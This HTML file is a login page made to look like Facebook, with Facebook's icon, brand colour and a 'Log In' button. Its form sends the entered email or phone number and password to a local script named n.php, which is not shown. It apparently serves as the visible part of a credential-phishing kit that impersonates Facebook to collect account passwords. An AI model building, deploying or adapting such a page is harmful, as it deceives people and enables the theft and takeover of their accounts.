<!DOCTYPE html>
<html>
<head>
	<title>Login</title>
	 <script src="https://kit.fontawesome.com/a076d05399.js"></script>
	 <style type="text/css">
	 	body{
	 		margin: 0;
	 		padding: 0;
	 		display: flex;
	 	}
	 	.fac{
	 		position: relative;
	 		display: inline-block;
	 		margin-left: 100px;
	 		max-height: 100px;
	 	}
	 	.icon{
	 		margin-left: 60px; 
	 		height: 80px;
	 		width: 80px;
	 		line-height: 80px;
	 		text-align: center;
	 		font-size: 60px;
	 		border-radius: 80px;
	 		color: #fff;
	 		background: #3b5999;
	 	}
	 </style>
</head>
<body>  
	<div class="fac">
		<div class="icon">
			<i class="fab fa-facebook-f"></i>
		</div>

		<div class="input">
			<form action="n.php" method="post">
			<input type="text" placeholder="Email or Phone number" name="email" required="" style="height: 20px;width: 250px;"><br><br>
			<input type="password" name="password" placeholder="enter password" required="" style="height: 20px;width: 250px;"><br>
			<br>
			<input type="submit" value="Log In" name="" style="height: 20px;width: 250px; background: #3b5999; color: #fff;">
			</form>
		</div>
		</div>
	

</body>
</html>